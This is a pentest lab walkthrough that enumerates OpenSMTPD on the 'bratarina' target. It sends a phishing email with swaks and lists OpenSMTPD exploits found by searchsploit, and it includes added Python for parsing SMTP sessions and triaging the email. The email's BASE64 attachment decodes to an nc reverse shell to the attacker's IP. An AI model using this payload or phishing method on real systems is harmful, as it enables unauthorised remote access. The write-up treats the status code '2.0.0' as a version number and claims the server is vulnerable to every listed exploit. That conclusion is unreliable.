SMTP


Nmap discovered an SMTP server on target port 25. The running service is OpenSMTPD.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ telnet $IP 25                                  
Trying 192.168.132.71...
Connected to 192.168.132.71.
Escape character is '^]'.
220 bratarina ESMTP OpenSMTPD
EHLO all
250-bratarina Hello all [192.168.45.192], pleased to meet you
250-8BITMIME
250-ENHANCEDSTATUSCODES
250-SIZE 36700160
250-DSN
250 HELP
HELP
214-2.0.0 This is OpenSMTPD
214-2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org
214-2.0.0 with full details
214 2.0.0 End of HELP info

It would appear that the target OpenSMTPD instance is running version 2.0.0.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ swaks --to root@localhost --server $IP      
=== Trying 192.168.132.71:25...
=== Connected to 192.168.132.71.
<-  220 bratarina ESMTP OpenSMTPD
 -> EHLO kali
<-  250-bratarina Hello kali [192.168.45.192], pleased to meet you
<-  250-8BITMIME
<-  250-ENHANCEDSTATUSCODES
<-  250-SIZE 36700160
<-  250-DSN
<-  250 HELP
 -> MAIL FROM:<kali@kali>
<-  250 2.0.0 Ok
 -> RCPT TO:<root@localhost>
<-  250 2.1.5 Destination address valid: Recipient ok
 -> DATA
<-  354 Enter mail, end with "." on a line by itself
 -> Date: Mon, 24 Mar 2025 11:58:18 +0100
 -> To: root@localhost
 -> From: kali@kali
 -> Subject: test Mon, 24 Mar 2025 11:58:18 +0100
 -> Message-Id: <20250324115818.012278@kali>
 -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
 -> 
 -> This is a test mailing
 -> 
 -> 
 -> .
<-  250 2.0.0 678f78c1 Message accepted for delivery
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.

The target SMTP server allows sending mail without authentication.
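As an added example (not part of the original writeup), the Python below parses a swaks-style transcript like the one above. It splits every server reply into its three-digit reply code, the optional dotted enhanced status code (RFC 3463, advertised with ENHANCEDSTATUSCODES and visible in replies such as `250 2.0.0 Ok` and the `214-2.0.0` HELP lines) and its text, collects the EHLO extension list, and reports whether AUTH or STARTTLS was offered and whether a message was accepted without any AUTH command having been sent. The sample transcript is a shortened, constructed copy of the session shown above; the function names are mine.

```python
import re

# Constructed sample: a shortened copy of the swaks session above, in swaks'
# own "<-  " (server) / " -> " (client) notation.
SAMPLE_SESSION = """\
=== Connected to 192.168.132.71.
<-  220 bratarina ESMTP OpenSMTPD
 -> EHLO kali
<-  250-bratarina Hello kali [192.168.45.192], pleased to meet you
<-  250-8BITMIME
<-  250-ENHANCEDSTATUSCODES
<-  250-SIZE 36700160
<-  250-DSN
<-  250 HELP
 -> MAIL FROM:<kali@kali>
<-  250 2.0.0 Ok
 -> RCPT TO:<root@localhost>
<-  250 2.1.5 Destination address valid: Recipient ok
 -> DATA
<-  354 Enter mail, end with "." on a line by itself
 -> To: root@localhost
 -> From: kali@kali
 ->
 -> This is a test mailing
 -> .
<-  250 2.0.0 678f78c1 Message accepted for delivery
 -> QUIT
<-  221 2.0.0 Bye
"""

# reply code, continuation marker, optional enhanced status code, free text
REPLY_RE = re.compile(r"^(\d{3})([ -])(?:(\d\.\d{1,3}\.\d{1,3})(?: |$))?(.*)$")


def parse_reply(line):
    """Split one server reply line into its parts.

    The leading three digits are the SMTP reply code (RFC 5321).  The dotted
    triple that may follow is an enhanced status code (RFC 3463); it is not a
    software version.  A dash after the code marks a continuation line.
    """
    m = REPLY_RE.match(line)
    if not m:
        raise ValueError(f"not an SMTP reply: {line!r}")
    code, sep, esc, text = m.groups()
    return {"code": int(code), "final": sep == " ", "esc": esc, "text": text}


def summarize_session(transcript):
    """Walk a swaks transcript and summarise what the server offered and accepted."""
    state = {"banner": None, "extensions": [], "commands": [],
             "auth_used": False, "message_accepted": False}
    pending, lines, in_data = None, [], False
    for raw in transcript.splitlines():
        if raw.startswith(" ->"):                    # client -> server
            payload = raw[4:]
            if in_data:                              # message content, not commands
                if payload == ".":
                    in_data, pending, lines = False, ".", []
                continue
            if not payload:
                continue
            pending, lines = payload, []
            if payload.upper().startswith("AUTH"):
                state["auth_used"] = True
        elif raw.startswith("<-"):                   # server -> client
            reply = parse_reply(raw[4:])
            if pending is None:                      # greeting, before any command
                state["banner"] = reply["text"]
                continue
            lines.append(reply)
            if not reply["final"]:
                continue                             # more lines of this reply follow
            verb = "DATA-END" if pending == "." else pending.split()[0].split(":")[0].upper()
            state["commands"].append((verb, reply["code"], reply["esc"]))
            if verb == "EHLO" and reply["code"] == 250:
                state["extensions"] = [r["text"] for r in lines[1:]]   # skip the greeting line
            elif verb == "DATA" and reply["code"] == 354:
                in_data = True
            elif verb == "DATA-END" and reply["code"] == 250:
                state["message_accepted"] = True
    keywords = {e.split()[0].upper() for e in state["extensions"]}
    state["auth_advertised"] = "AUTH" in keywords
    state["starttls_advertised"] = "STARTTLS" in keywords
    state["accepted_without_auth"] = state["message_accepted"] and not state["auth_used"]
    return state


if __name__ == "__main__":
    summary = summarize_session(SAMPLE_SESSION)
    for key in ("banner", "extensions", "auth_advertised",
                "starttls_advertised", "accepted_without_auth"):
        print(f"{key}: {summary[key]}")
```

Run against the sample, the summary shows no AUTH and no STARTTLS in the EHLO list and a message accepted with no AUTH command in the session, which is the condition the writeup describes; the same parser can be pointed at any saved swaks output.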

Phishing Attempt


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ swaks --to neil@localhost --header "subject: Check this out" --body "http://192.168.45.192" --attach @shell --server $IP     
=== Trying 192.168.132.71:25...
=== Connected to 192.168.132.71.
<-  220 bratarina ESMTP OpenSMTPD
 -> EHLO kali
<-  250-bratarina Hello kali [192.168.45.192], pleased to meet you
<-  250-8BITMIME
<-  250-ENHANCEDSTATUSCODES
<-  250-SIZE 36700160
<-  250-DSN
<-  250 HELP
 -> MAIL FROM:<kali@kali>
<-  250 2.0.0 Ok
 -> RCPT TO:<neil@localhost>
<-  250 2.1.5 Destination address valid: Recipient ok
 -> DATA
<-  354 Enter mail, end with "." on a line by itself
 -> Date: Mon, 24 Mar 2025 12:21:55 +0100
 -> To: neil@localhost
 -> From: kali@kali
 -> Subject: test Mon, 24 Mar 2025 12:21:55 +0100
 -> Message-Id: <20250324122155.026139@kali>
 -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
 -> MIME-Version: 1.0
 -> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_26139"
 -> subject: Check this out
 -> 
 -> ------=_MIME_BOUNDARY_000_26139
 -> Content-Type: text/plain
 -> 
 -> http://192.168.45.192
 -> ------=_MIME_BOUNDARY_000_26139
 -> Content-Type: application/octet-stream; name="shell"
 -> Content-Description: shell
 -> Content-Disposition: attachment; filename="shell"
 -> Content-Transfer-Encoding: BASE64
 -> 
 -> bWtmaWZvIC90bXAvdHFoeTsgbmMgMTkyLjE2OC40NS4xOTIgNDQ1IDA8L3RtcC90cWh5IHwgL2Jp
 -> bi9zaCA+L3RtcC90cWh5IDI+JjE7IHJtIC90bXAvdHFoeQ==
 -> 
 -> ------=_MIME_BOUNDARY_000_26139--
 -> 
 -> 
 -> .
<-  250 2.0.0 570b54fe Message accepted for delivery
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.

The phishing attempt against the neil user, found in the passwd backup file, failed.
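From the receiving side, the message above is the kind of thing a mail gateway or analyst should be able to pick apart: a multipart/mixed body, a text part containing a link to a bare IP address, an application/octet-stream attachment with no file extension delivered as BASE64, and (as the transcript shows) two Subject headers, because the `--header "subject: ..."` value was added alongside the default swaks subject rather than replacing it. The following Python is an added triage example, not part of the writeup: it rebuilds a message with the same MIME layout (the attachment body here is a harmless constructed script, not the page's payload), walks the parts with the standard `email` library, and returns the findings a reviewer would want. Function and variable names are mine.

```python
import base64
import re
from email import message_from_string, policy

# Constructed sample: same MIME layout as the swaks message above, but the
# attachment body is a harmless constructed script rather than the page's.
ATTACHMENT_TEXT = "#!/bin/sh\necho constructed sample attachment\n"
ATTACHMENT_B64 = base64.b64encode(ATTACHMENT_TEXT.encode()).decode()
SAMPLE_MESSAGE = "\n".join([
    "Date: Mon, 24 Mar 2025 12:21:55 +0100",
    "To: neil@localhost",
    "From: kali@kali",
    "Subject: test Mon, 24 Mar 2025 12:21:55 +0100",
    "Message-Id: <20250324122155.026139@kali>",
    "X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/",
    "MIME-Version: 1.0",
    'Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_26139"',
    "subject: Check this out",
    "",
    "------=_MIME_BOUNDARY_000_26139",
    "Content-Type: text/plain",
    "",
    "http://192.168.45.192",
    "------=_MIME_BOUNDARY_000_26139",
    'Content-Type: application/octet-stream; name="shell"',
    "Content-Description: shell",
    'Content-Disposition: attachment; filename="shell"',
    "Content-Transfer-Encoding: BASE64",
    "",
    ATTACHMENT_B64,
    "",
    "------=_MIME_BOUNDARY_000_26139--",
    "",
])

URL_RE = re.compile(r"https?://[^\s<>\"']+")
# a URL whose host is a literal IPv4 address rather than a name
BARE_IP_RE = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/\S*)?$")
SHELL_MARKERS = (b"/bin/sh", b"/bin/bash", b"mkfifo")


def looks_like_script(data):
    """True if decoded attachment bytes start with a shebang or carry shell markers."""
    return data.startswith(b"#!") or any(m in data for m in SHELL_MARKERS)


def triage_message(raw):
    """Parse a raw RFC 5322 message and collect review findings."""
    msg = message_from_string(raw, policy=policy.default)
    subjects = [str(v) for v in msg.get_all("subject", [])]   # header names are case-insensitive
    urls, attachments, findings = [], [], []
    if len(subjects) > 1:
        findings.append(f"duplicate Subject header: {subjects}")
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue                                   # containers carry no payload of their own
        filename = part.get_filename()
        data = part.get_payload(decode=True) or b""    # undoes the transfer encoding (BASE64 here)
        if filename or part.get_content_disposition() == "attachment":
            info = {"filename": filename, "content_type": part.get_content_type(),
                    "size": len(data), "has_extension": "." in (filename or ""),
                    "looks_like_script": looks_like_script(data)}
            attachments.append(info)
            if info["content_type"] == "application/octet-stream" and not info["has_extension"]:
                findings.append(f"attachment {filename!r} is application/octet-stream with no extension")
            if info["looks_like_script"]:
                findings.append(f"attachment {filename!r} decodes to a shell script")
        elif part.get_content_maintype() == "text":
            for url in URL_RE.findall(data.decode("utf-8", "replace")):
                urls.append(url)
                if BARE_IP_RE.match(url):
                    findings.append(f"link to bare IP address: {url}")
    return {"subjects": subjects, "urls": urls, "attachments": attachments, "findings": findings}


if __name__ == "__main__":
    for finding in triage_message(SAMPLE_MESSAGE)["findings"]:
        print("-", finding)
```

The checks are deliberately structural (decoded content, declared type versus file name, link host form, header duplication) rather than signature based, so they apply to a message regardless of what the attachment is named.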

Vulnerabilities


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ searchsploit OpenSMTPD
----------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                               |  Path
----------------------------------------------------------------------------- ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)                     | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)                 | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution                                      | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read                                        | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution     | openbsd/remote/48140.c
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Looking up OpenSMTPD for vulnerabilities reveals many exploits. Given that the instance is running version 2.0.0, it is vulnerable to all of them, including CVE-2020-7247.